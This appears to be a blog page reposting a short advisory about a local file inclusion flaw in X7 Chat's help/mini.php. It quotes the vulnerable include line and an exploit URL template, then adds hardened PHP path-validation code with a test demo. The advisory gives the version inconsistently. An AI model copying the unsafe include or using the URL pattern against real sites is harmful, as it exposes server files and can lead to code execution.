LFI to RCE via access_log injection

X7 Chat 2.0.1A1 - LFI


[o] X7 Chat 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe


[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");


[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]


[o] Publish
http://milw0rm.com/exploits/6592
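
A hardened form of the include shown under "Vulnerable file", as an added example that is not part of the original advisory and not X7 Chat's own code. The function name resolve_help_file(), the file-name rule and the demo file names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not X7 Chat code): map a user-supplied help_file value
// to a regular file inside $helpDir, or return null when it must be refused.
function resolve_help_file($requested, string $helpDir): ?string
{
    // Arrays (?help_file[]=x) and empty values are refused outright.
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // Accept a bare file name only: no separators, no "..", no NUL byte,
    // no stream-wrapper syntax. The character class is an assumed naming rule.
    if (!preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?\z/', $requested)) {
        return null;
    }
    $base   = realpath($helpDir);
    $target = realpath($helpDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $target === false || !is_file($target)) {
        return null;
    }
    // Containment check on the resolved path, so a symlink placed inside
    // the help directory cannot point the request somewhere else.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo tree: one help file and one file outside the help directory.
$root = sys_get_temp_dir() . '/x7help_demo_' . bin2hex(random_bytes(4));
mkdir("$root/help", 0700, true);
file_put_contents("$root/help/commands.txt", "help text\n");
file_put_contents("$root/outside.txt", "not a help file\n");

// Constructed inputs: only the first one names a file in the help directory.
$samples = ['commands.txt', 'missing.txt', '../outside.txt',
            "$root/outside.txt", "commands.txt\0.php", ['commands.txt']];
foreach ($samples as $s) {
    $path = resolve_help_file($s, "$root/help");
    printf("%-45s %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
           $path === null ? 'refused' : 'served');
}

// Remove the demo tree.
unlink("$root/help/commands.txt");
unlink("$root/outside.txt");
rmdir("$root/help");
rmdir($root);
```

If the help pages are static text, sending the resolved path with readfile() instead of include keeps the file's contents from being executed as PHP even if the lookup is later weakened.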


Comments

labatterie said…
I had been looking for this product.